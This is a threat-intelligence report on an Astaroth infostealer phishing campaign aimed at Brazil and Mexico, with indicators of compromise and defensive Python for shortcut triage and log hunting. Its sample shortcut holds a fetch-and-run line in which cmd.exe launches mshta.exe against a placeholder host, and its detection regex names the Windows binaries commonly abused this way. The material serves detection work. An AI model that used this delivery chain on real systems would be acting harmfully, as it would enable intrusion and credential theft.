Astaroth Infostealer Campaign
16 June 2025
By Samantha Clarke
What you'll learn in this notification
- Information stealer Trojan that predominantly targets Brazil and Mexico with a financial motive.
- Employs country-specific social engineering tactics.
- Leverages newly registered, low-reputation domains that impersonate legitimate services.
Samantha Clarke and the Mimecast threat researchers have recently identified an Astaroth infostealer campaign. Astaroth is a mature information stealer Trojan that has been active in the threat landscape since 2017, with development traced back to 2015. It targets Latin American countries, concentrating on Brazil and Mexico, where it achieves its highest infection rates.
Astaroth uses a multi-stage infection chain that begins with a phishing email containing an evasive URL hosted on secureserver.net. When the link is clicked, a zip archive is downloaded containing a malicious shortcut (.lnk) file. The shortcut invokes cmd.exe, which launches mshta.exe to run obfuscated JavaScript; that script then connects to a command and control (C2) server and exfiltrates sensitive system data. The chain is notable for being largely fileless, for abusing legitimate OS tools (cmd.exe and mshta.exe are signed Windows binaries) and for evasion techniques that help it bypass signature-based detection.
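The shortcut step of the chain described above can be triaged without executing it, because a .lnk file stores the target path and its command-line arguments in fixed, documented fields (the MS-SHLLINK StringData section). The following Python is an added example, not code from the original notification or from Mimecast: it parses the shell link header and StringData, then flags the cmd.exe/mshta.exe launch pattern. The sample shortcut is built in-process from a hypothetical URL (example.invalid); no campaign file is embedded and the field values are constructed.

```python
"""Offline triage of a Windows shortcut (.lnk) per MS-SHLLINK.
The sample shortcut below is constructed here; it is not a campaign artefact."""
import re
import struct

# LinkFlags bits from the ShellLinkHeader (MS-SHLLINK 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# LinkCLSID 00021401-0000-0000-C000-000000000046, serialised little-endian.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link, or raise ValueError."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                     # end of the fixed 76-byte header
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for name, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION)):
        if not flags & bit:
            fields[name] = ""
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated StringData field {name}")
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return fields


LOLBIN = re.compile(r"\b(cmd|mshta|powershell|pwsh|wscript|cscript|rundll32|regsvr32)(?:\.exe)?\b", re.I)
URL = re.compile(r"https?://[^\s\"']+", re.I)


def triage_lnk(data: bytes) -> dict:
    """Classify a shortcut by the interpreters it launches and any URL it carries."""
    fields = parse_lnk(data)
    # The full CountCharacters is read, so whitespace padding in Arguments cannot hide the command.
    launch = f'{fields["relative_path"]} {fields["arguments"]}'
    lolbins = sorted({m.group(1).lower() for m in LOLBIN.finditer(launch)})
    urls = URL.findall(launch)
    if "mshta" in lolbins and urls:
        verdict = "malicious-pattern"   # shortcut -> mshta.exe <remote script>: the chain above
    elif lolbins or urls:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"fields": fields, "lolbins": lolbins, "urls": urls, "verdict": verdict}


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode shortcut with only RelativePath and Arguments set.
    Used only to construct offline samples for this example."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b""
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed samples: a hypothetical lure shortcut and a benign document shortcut.
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\cmd.exe",
                       '/c start /min mshta.exe "http://example.invalid/lure.hta"')
BENIGN_LNK = build_lnk(r"..\Documents\report.docx", "")

if __name__ == "__main__":
    for blob in (SAMPLE_LNK, BENIGN_LNK):
        print(triage_lnk(blob))
```

A clean verdict from this check is not clearance: the parser reads only StringData, so a shortcut whose target is expressed solely through the LinkTargetIDList, or one that drops a second-stage file rather than naming mshta.exe directly, needs a full LNK parser and detonation in the target geography.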
The malware has a modular architecture that supports broad data theft, including banking credentials, session cookies and stored site logins. Multiple security vendors have documented Astaroth's technical evolution; Cybereason analysed campaigns targeting Brazil and Mexico that were delivered through the same secureserver.net infrastructure. Astaroth campaigns operate with remarkable consistency, keeping a daily activity schedule that excludes weekends and reaching significant scale with email volumes of 10,000 to 100,000 messages per day. Microsoft's security research documented early iterations of these fileless techniques, noting the campaign's sustained operational tempo and infrastructure evolution.
Much of Astaroth's operational success comes from geofencing: the payload is served only to requests originating from the intended target regions, which maximises infection rates while limiting exposure to security researchers and sandboxes outside those geographies. A practical consequence is that a detonation from outside Brazil or Mexico may receive nothing, or a benign page, so a clean sandbox result on its own does not clear a sample.
Campaign Themes
The threat actors deploy region-specific social engineering tactics that align with local cultural and business practices. Mexican campaigns often utilize financial transaction themes, incorporating invoice-related content and transactional notifications that resonate with business users. Brazilian campaigns leverage judicial request themes and government notice impersonation, exploiting local administrative processes and official communication channels.
Some example lures captured from the campaign:
Technical Infrastructure
Campaigns send from newly registered domains that have no established reputation and impersonate legitimate business services.
The threat consistently uses secureserver.net URLs (GoDaddy's hosting namespace) for both initial payload delivery and ongoing command and control communications. Hosting on GoDaddy-registered domains gives the infrastructure reliable service with a legitimate appearance.
Mimecast Protection
Several attributes of the recent campaigns have been added to our detection capabilities. We continue to monitor for changes in the techniques used by this threat operation.
Targets:
Mexican and Brazilian organizations in the retail, wholesale and manufacturing verticals.
Indicators of Compromise (IOCs)
Sending Domains
brpassarobemtevi[.]sbs
brpassarobicodelacre[.]sbs
brpassarocacatua[.]sbs
brpassarocalcario[.]sbs
brpassarocigana[.]sbs
brpassarocurio[.]sbs
brpassarodaeuropa[.]sbs
brpassarodobrasil[.]sbs
brpassarogalinhadagua[.]sbs
brpassaroguariba[.]sbs
brpassarojoaobobo[.]sbs
brpassarosabiadocampo[.]sbs
brpassarosaracua[.]sbs
brpassarosofre[.]sbs
brpassaroticotico[.]sbs
Email Subjects
Notificação importante sobre reclamação de cliente (English: Important notice about a customer complaint)
Confira os detalhes da nova reclamação registrada (English: Check the details of the newly registered complaint)
Reclamação recebida: acesse os detalhes imediatamente (English: Complaint received: access the details immediately)
Detalhes da reclamação: veja e resolva o mais rápido possível (English: Complaint details: view and resolve as soon as possible)
Secure Server URL
198.55.167.72.host.secureserver[.]net
File Hash
Zip file: 8f2b0918ccd5d95a42dd1fee72f501d7a898815be6929fc68599e16288a90d4f
LNK file: 1cc7118960b93a91454bbc4498d379e382feeacbdc4a67df7189213c834061ca
Command-and-control Infrastructure
plokinnal[.]ameyttistta[.]help
Recommendations
- Network Controls
  - Monitor for anomalous connections to newly registered domains and to GoDaddy secureserver.net hosts, which this campaign uses for both payload delivery and C2.
- Email Security
  - Deploy detection rules for shortcut (.lnk) files, including those nested in zip archives, whether attached directly or fetched from a linked URL.
- User security awareness training
  - Educate users on the latest lures used in these campaigns.
  - Conduct regular phishing simulations that include the latest threats.
  - Train users never to open attachments from unknown or unverified senders.
- Proactive threat hunting
  - Search email receipt logs for the subject lines listed above.
  - Search email receipt logs for emails originating from the identified sending domains.
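The two hunting searches above can be run as one pass over exported receipt logs. The following Python is an added example, not code from the original notification or from Mimecast, and the JSON-lines record layout (ts, sender, recipient, subject, attachments) is an assumption standing in for whatever your gateway exports. It matches the listed sending domains and subject lines, normalises the Portuguese subjects so accents and casing do not cause misses, and, as a labelled assumption, also flags siblings of the listed domains that share their naming convention. The log records are constructed for the example.

```python
"""Retro-hunt of email receipt logs for the Astaroth IOCs listed above.
Record layout is a constructed JSON-lines format, not a vendor export schema."""
import json
import re
import unicodedata

# IOCs from the notification, kept in the page's defanged form.
IOC_SENDING_DOMAINS = {
    "brpassarobemtevi[.]sbs", "brpassarobicodelacre[.]sbs", "brpassarocacatua[.]sbs",
    "brpassarocalcario[.]sbs", "brpassarocigana[.]sbs", "brpassarocurio[.]sbs",
    "brpassarodaeuropa[.]sbs", "brpassarodobrasil[.]sbs", "brpassarogalinhadagua[.]sbs",
    "brpassaroguariba[.]sbs", "brpassarojoaobobo[.]sbs", "brpassarosabiadocampo[.]sbs",
    "brpassarosaracua[.]sbs", "brpassarosofre[.]sbs", "brpassaroticotico[.]sbs",
}
IOC_SUBJECTS = {
    "Notificação importante sobre reclamação de cliente",
    "Confira os detalhes da nova reclamação registrada",
    "Reclamação recebida: acesse os detalhes imediatamente",
    "Detalhes da reclamação: veja e resolva o mais rápido possível",
}
# Assumption: the listed domains share one naming convention, so an unlisted sibling
# is still worth review. The actor may change the pattern at any time.
DOMAIN_PATTERN = re.compile(r"^brpassaro[a-z]+\.sbs$")


def refang(domain: str) -> str:
    return domain.replace("[.]", ".").lower()


def norm_subject(s: str) -> str:
    """NFC-normalise, casefold and collapse whitespace so accented Portuguese
    subjects compare reliably across mail clients and log exporters."""
    return " ".join(unicodedata.normalize("NFC", s).casefold().split())


DOMAINS = {refang(d) for d in IOC_SENDING_DOMAINS}
SUBJECTS = {norm_subject(s) for s in IOC_SUBJECTS}


def hunt(log_lines):
    """Return one hit per matching record, with the reasons it matched."""
    hits = []
    for line in log_lines:
        rec = json.loads(line)
        reasons = []
        sender_domain = rec.get("sender", "").rsplit("@", 1)[-1].lower()
        if sender_domain in DOMAINS:
            reasons.append("ioc_sending_domain")
        elif DOMAIN_PATTERN.match(sender_domain):
            reasons.append("sibling_of_ioc_domain")
        if norm_subject(rec.get("subject", "")) in SUBJECTS:
            reasons.append("ioc_subject")
        if any(a.lower().endswith(".zip") for a in rec.get("attachments", [])):
            reasons.append("zip_attachment")   # weak alone; corroborates the matches above
        if reasons and reasons != ["zip_attachment"]:
            hits.append({"ts": rec["ts"], "recipient": rec["recipient"],
                         "sender": rec["sender"], "reasons": reasons})
    return hits


# Constructed sample log; these records are not from a real environment.
SAMPLE_LOG = [
    json.dumps({"ts": "2025-06-10T13:02:11Z", "sender": "sac@brpassarocurio.sbs",
                "recipient": "fin@corp.example",
                "subject": "Reclamação recebida: acesse os detalhes imediatamente",
                "attachments": ["Reclamacao_2025.zip"]}, ensure_ascii=False),
    json.dumps({"ts": "2025-06-10T13:05:40Z", "sender": "ouvidoria@brpassaroexemplo.sbs",
                "recipient": "rh@corp.example",
                "subject": "  NOTIFICAÇÃO importante sobre reclamação de cliente ",
                "attachments": ["Notificacao.zip"]}, ensure_ascii=False),
    json.dumps({"ts": "2025-06-10T13:09:03Z", "sender": "noreply@vendor.example",
                "recipient": "fin@corp.example", "subject": "Invoice 4471 attached",
                "attachments": ["invoice_4471.pdf"]}, ensure_ascii=False),
    json.dumps({"ts": "2025-06-10T13:11:27Z", "sender": "it@corp.example",
                "recipient": "all@corp.example", "subject": "Backup archive",
                "attachments": ["backup.zip"]}, ensure_ascii=False),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit)
```

Exact subject matching is deliberately conservative; once the listed lures are confirmed in your logs, widening the subject test to the "reclamação" theme will surface variants the actor rotates in, at the cost of more review.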